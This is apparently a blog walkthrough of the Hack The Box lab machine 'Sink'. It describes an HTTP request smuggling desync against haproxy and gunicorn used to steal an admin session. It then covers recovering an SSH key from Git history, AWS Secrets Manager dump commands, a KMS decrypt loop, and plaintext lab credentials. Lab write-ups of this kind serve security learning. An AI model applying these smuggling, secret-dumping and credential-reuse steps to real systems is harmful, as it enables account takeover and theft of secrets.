Nmap
Recon
- HTTP Smuggling Attack
- Enumerate the Git Repositories
- Dump AWS (Amazon Web Services) Secrets, Keys
- Decryption using AWS KMS

Short Brief

HTTP Smuggling attack on haproxy, gunicorn server combination. Get admin session key using smuggling attack and leak his notes containing usernames and passwords. Login with a user on Gitea and one of the repo was leaking private key for a user and AWS credentials. Login with private key and configure aws and dump secret keys. Get a password from the dumped secret key and decrypt a message using AWS KMS (Key Management Service) and find the base64 encoded hash which contains the root password.

Nmap

As usual let’s start with nmap port scan

Nmap scan report for 10.129.186.159
Host is up (0.18s latency).
Not shown: 60311 closed ports, 5221 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
5000/tcp open  upnp

Port 22, 3000, 5000 are open. Less ports then we have to enumerate more.

Recon

Let’s enumerate

Port 3000

[Pasted image 20210811043220.png]

Port 5000

[Pasted image 20210811043255.png]

We have some kind of DevOps blog. And we have a sign up page. Let’s signup and see what we have.

[Pasted image 20210811043817.png]

[Pasted image 20210811043852.png]

cat /etc/hosts

10.129.186.244 sink.htb

[Pasted image 20210811050433.png]

We can add some notes here. Apart from this we dont have much interesting things on the webpage.

[Pasted image 20210811050853.png]

Server: gunicorn/20.0.0
Date: Wed, 11 Aug 2021 04:11:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 217
Location: http://10.129.186.244:5000/home
Vary: Cookie
Via: haproxy
X-Served-By: 874e4a1392a2

The response headers from the server caught my attention. There is a gunicorn server in the backend and haproxy is acting like a load balancer.

[Pasted image 20210811051428.png]

After doing some research, haproxy gunicorn combination is vulnerable to HTTP Smuggling attack if it is not properly configured. So now we need to find out what kind of smuggling attack we can do.

I Highly Recommend to Read these articles https://portswigger.net/web-security/request-smuggling

[Pasted image 20210811052044.png]

When the front-end server forwards HTTP requests to a back-end server, it typically sends several requests over the same back-end network connection, because this is much more efficient and performant. The protocol is very simple: HTTP requests are sent one after another, and the receiving server parses the HTTP request headers to determine where one request ends and the next one begins:

[Pasted image 20210811051916.png]

In this situation, it is crucial that the front-end and back-end systems agree about the boundaries between requests. Otherwise, an attacker might be able to send an ambiguous request that gets interpreted differently by the front-end and back-end systems:

[Pasted image 20210811051954.png]

Haproxy is using Transfer-Encoding and Gunicorn server is using Content-Length as primary.

So let’s submit a comment on the main page we have seen and intercept in BurpSuite

HTTP Smuggling DeSync Attack

[Pasted image 20210811052340.png]

[Pasted image 20210811052404.png]

Send the request to Repeater in burpsuite and modifying the payload.

[Pasted image 20210811052559.png]

We craft the payload and write two requests in one request. As the HAProxy will see it as one request because Transfer-Encoding but we put a special character [\x0b] byte in front of chunked which is ignored by HAProxy but it is interpreted by gunicorn server and breaks into two requests at the backend. Second request we mention the Content-Length size as little more than usual request length so that we can grab the next incoming request and attaching it to out comment field msg.

Let;s send this request and see if we can grab other users request.

[Pasted image 20210811053502.png]

[Pasted image 20210811053532.png]

And yes, we could the grab the next incoming request containing a session key which is different from our session-key.

[Pasted image 20210811053844.png]

After changing the session key refresh the page.

[Pasted image 20210811053925.png]

We are admin user on the website.

[Pasted image 20210811054046.png]

There are some notes stored in the admin notes section. We can view the notes.

[Pasted image 20210811054307.png]

[Pasted image 20210811054320.png]

[Pasted image 20210811054334.png]

Notes contain usernames, password and subdomains.

Let’s add the new subdomain and enumerate the pages.

cat /etc/hosts

10.129.186.244 sink.htb nagios.sink.htb chef.sink.htb code.sink.htb

All the subdomains are pointing to the same sites on 3000 and 5000 ports.

Let’s enumerate Port 3000 now. We know that we have GitTea implemented.

[Pasted image 20210811055016.png]

We have few more users from the GitTea users section. Let’s add them to our list. One user root is common in both the sights. I tried to login with root user on Gitea.

user: root pass: FaH@3L>Z3})zzfQ3

[Pasted image 20210811055309.png]

[Pasted image 20210811055325.png]

Yep, we could login as root user on Gitea and there are some private repositories for the user. We can view them.

[Pasted image 20210811055503.png]

We have 9 commits on Key_Management repository.

[Pasted image 20210811055852.png]

After going through each commit and the differences in each commit.

[Pasted image 20210811055932.png]

Marcus committed a SSH private key bymistake and deleted in the next commit. But Git stores all the commits. Developers should be careful while commit the changes to version control management.

Deletion from commit is shown in red

[Pasted image 20210811060142.png]

I have copied SSH key locally and tried to login with marcus user.

[Pasted image 20210811060356.png]

[Pasted image 20210811060622.png]

[Pasted image 20210811060653.png]

We are marcus on the box and we have a user flag. Now we need to find a way to escalate to root.

User Escalation

Revisiting the Gitea for aws (Amazon Web Services) keys.

[Pasted image 20210811061429.png]

<?php
require 'vendor/autoload.php';

use Aws\CloudWatchLogs\CloudWatchLogsClient;
use Aws\Exception\AwsException;

$client = new CloudWatchLogsClient([
	'region' => 'eu',
	'endpoint' => 'http://127.0.0.1:4566',
	'credentials' => [
		'key' => 'AKIAIUEN3QWCPSTEITJQ',
		'secret' => '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'
	],
	'version' => 'latest'
]);
try {
$client->createLogGroup(array(
	'logGroupName' => 'Chef_Events',
));
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
try {
$client->createLogStream([
	'logGroupName' => 'Chef_Events',
	'logStreamName' => '20201120'
]);
}catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
?>

We have AWS key and secret. So let’s configure aws client using marcus user.

[Pasted image 20210811061823.png]

AWS Secrets Manager

AWS Secrets Manager is a great service to enhance your security posture by allowing you to remove any hard-coded secrets within your application and replacing them with a simple API call to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a single source of truth for all your secrets across all of your applications.

AWS Secrets Manager enables the ease of rotating secrets and therefore enhancing the security of that secret. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys.

Access to your secrets within AWS Secret Manager is governed by fine-grained IAM identity-based policies in addition to resource-based policies.

To allow a user form a different account to access your secret you need to authorize him to access the secret and also authorize him to decrypt the secret in KMS. The Key policy also needs to allows the external user to use it.

AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.

marcus@sink:~$ aws secretsmanager list-secrets --endpoint-url=http://127.0.0.1:4566
{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ZBdpT",
            "Name": "Jenkins Login",
            "Description": "Master Server to manage release cycle 1",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "28dcf9a0-77f9-4c79-bf06-179d44f79aba": [
                    "AWSCURRENT"
                ]
            }
        },
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-yuzCR",
            "Name": "Sink Panel",
            "Description": "A panel to manage the resources in the devnode",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "7992c80a-cddb-48ff-9dad-32a158c05087": [
                    "AWSCURRENT"
                ]
            }
        },
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-BdPAO",
            "Name": "Jira Support",
            "Description": "Manage customer issues",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "59881642-c591-4d5b-8773-5f76297dfc7a": [
                    "AWSCURRENT"
                ]
            }
        }
    ]
}
marcus@sink:~$ 

[Pasted image 20210811183750.png]

marcus@sink:~$ aws secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ZBdpT" --endpoint-url=http://127.0.0.1:4566
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-ZBdpT",
    "Name": "Jenkins Login",
    "VersionId": "28dcf9a0-77f9-4c79-bf06-179d44f79aba",
    "SecretString": "{\"username\":\"john@sink.htb\",\"password\":\"R);\\)ShS99mZ~8j\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1628654129
}
marcus@sink:~$ aws secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-yuzCR" --endpoint-url=http://127.0.0.1:4566
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-yuzCR",
    "Name": "Sink Panel",
    "VersionId": "7992c80a-cddb-48ff-9dad-32a158c05087",
    "SecretString": "{\"username\":\"albert@sink.htb\",\"password\":\"Welcome123!\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1628654129
}
marcus@sink:~$ aws secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-BdPAO" --endpoint-url=http://127.0.0.1:4566
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-BdPAO",
    "Name": "Jira Support",
    "VersionId": "59881642-c591-4d5b-8773-5f76297dfc7a",
    "SecretString": "{\"username\":\"david@sink.htb\",\"password\":\"EALB=bcC=`a7f2#k\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1628654129
}

Dumping the keys from aws secretsmanager using the secret id from secretsmanager list-keys.

In the dump keys, I obtained more passwords and users. So I tried to login with the credentials.

john@sink.htb :: R);\)ShS99mZ~8j albert@sink.htb :: Welcome123! david@sink.htb :: EALB=bcC=`a7f2#k

I tried to bruteforce with the usernames and passwords. As fail2ban was implemented on the box I was denied service for a while.

[Pasted image 20210811184643.png]

So i tried with the only user password combination, as user david also exist on the machine.

david@sink.htb :: EALB=bcC=`a7f2#k

[Pasted image 20210811185737.png]

[Pasted image 20210811190023.png]

[Pasted image 20210811191509.png]

Root Escalation

An encrypted file is seen in a file. Not sure how to decrypted we need keys to decrypt.

Let’s reconfigure aws client. AWS has key management service, where we can store keys, let’s see if we can find some keys in aws kms.

david@sink:~$ aws --endpoint-url=http://127.0.0.1:4566 kms list-keys
{
    "Keys": [
        {
            "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac"
        },
        {
            "KeyId": "16754494-4333-4f77-ad4c-d0b73d799939",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/16754494-4333-4f77-ad4c-d0b73d799939"
        },
        {
            "KeyId": "2378914f-ea22-47af-8b0c-8252ef09cd5f",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/2378914f-ea22-47af-8b0c-8252ef09cd5f"
        },
        {
            "KeyId": "2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/2bf9c582-eed7-482f-bfb6-2e4e7eb88b78"
        },
        {
            "KeyId": "53bb45ef-bf96-47b2-a423-74d9b89a297a",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/53bb45ef-bf96-47b2-a423-74d9b89a297a"
        },
        {
            "KeyId": "804125db-bdf1-465a-a058-07fc87c0fad0",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0"
        },
        {
            "KeyId": "837a2f6e-e64c-45bc-a7aa-efa56a550401",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/837a2f6e-e64c-45bc-a7aa-efa56a550401"
        },
        {
            "KeyId": "881df7e3-fb6f-4c7b-9195-7f210e79e525",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/881df7e3-fb6f-4c7b-9195-7f210e79e525"
        },
        {
            "KeyId": "c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/c5217c17-5675-42f7-a6ec-b5aa9b9dbbde"
        },
        {
            "KeyId": "f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/f0579746-10c3-4fd1-b2ab-f312a5a0f3fc"
        },
        {
            "KeyId": "f2358fef-e813-4c59-87c8-70e50f6d4f70",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/f2358fef-e813-4c59-87c8-70e50f6d4f70"
        }
    ]
}

We have many keys.

[Pasted image 20210811193947.png]

AWS KMS Decrypt reference https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/decrypt.html

david@sink:~$ aws --endpoint-url=http://127.0.0.1:4566 kms list-keys | grep Id | awk '{ print $2 }' | tr -d '",'
0b539917-5eff-45b2-9fa1-e13f0d2c42ac
16754494-4333-4f77-ad4c-d0b73d799939
2378914f-ea22-47af-8b0c-8252ef09cd5f
2bf9c582-eed7-482f-bfb6-2e4e7eb88b78
53bb45ef-bf96-47b2-a423-74d9b89a297a
804125db-bdf1-465a-a058-07fc87c0fad0
837a2f6e-e64c-45bc-a7aa-efa56a550401
881df7e3-fb6f-4c7b-9195-7f210e79e525
c5217c17-5675-42f7-a6ec-b5aa9b9dbbde
f0579746-10c3-4fd1-b2ab-f312a5a0f3fc
f2358fef-e813-4c59-87c8-70e50f6d4f70
david@sink:~$ 

Get keyId to suppy to decrypted the encrypted message.

for key in `cat keys`
do
aws kms decrypt --endpoint-url=http://127.0.0.1:4566 --ciphertext-blob \
fileb:///home/david/Projects/Prod_Deployment/servers.enc --key-id $key --output \
text --query Plaintext --encryption-algorithm "RSAES_OAEP_SHA_256"
done

david@sink:~$ sh run.sh 

An error occurred (DisabledException) when calling the Decrypt operation: 0b539917-5eff-45b2-9fa1-e13f0d2c42ac is disabled.

An error occurred (DisabledException) when calling the Decrypt operation: 16754494-4333-4f77-ad4c-d0b73d799939 is disabled.

An error occurred (DisabledException) when calling the Decrypt operation: 2378914f-ea22-47af-8b0c-8252ef09cd5f is disabled.

An error occurred (DisabledException) when calling the Decrypt operation: 2bf9c582-eed7-482f-bfb6-2e4e7eb88b78 is disabled.

An error occurred (DisabledException) when calling the Decrypt operation: 53bb45ef-bf96-47b2-a423-74d9b89a297a is disabled.
H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=

An error occurred (DisabledException) when calling the Decrypt operation: 837a2f6e-e64c-45bc-a7aa-efa56a550401 is disabled.

An error occurred (DisabledException) when calling the Decrypt operation: 881df7e3-fb6f-4c7b-9195-7f210e79e525 is disabled.

An error occurred (InternalFailureException) when calling the Decrypt operation (reached max retries: 4): key type not yet supported for decryption

An error occurred (DisabledException) when calling the Decrypt operation: f0579746-10c3-4fd1-b2ab-f312a5a0f3fc is disabled.

An error occurred (DisabledException) when calling the Decrypt operation: f2358fef-e813-4c59-87c8-70e50f6d4f70 is disabled.

H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=

Base64 encrypted key ?

Lets go to cyberchef and find out different keys

[Pasted image 20210811200540.png]

[Pasted image 20210811200559.png]

[Pasted image 20210811200617.png]

server:
  listenaddr: ""
  port: 80
  hosts:
    - certs.sink.htb
    - vault.sink.htb
defaultuser:
  name: admin
  pass: _uezduQ!EY5AHfe2

We have admin user and a password. Login with ROOT.

[Pasted image 20210811200736.png]

We are root on the box.

A Good Hack, lot of new learnings for me. HTTP Smuggling attack and AWS misconfigurations were similar to a recent attack which I have done on a real world network.

Sink HTB

Nmap

Recon

HTTP Smuggling DeSync Attack

User Escalation

AWS Secrets Manager

Root Escalation

Trending Tags

Sink HTB

Nmap

Recon

HTTP Smuggling DeSync Attack

User Escalation

AWS Secrets Manager

Root Escalation

Further Reading

BountyHunter HTB

Pikaboo HTB

Writer HTB

Trending Tags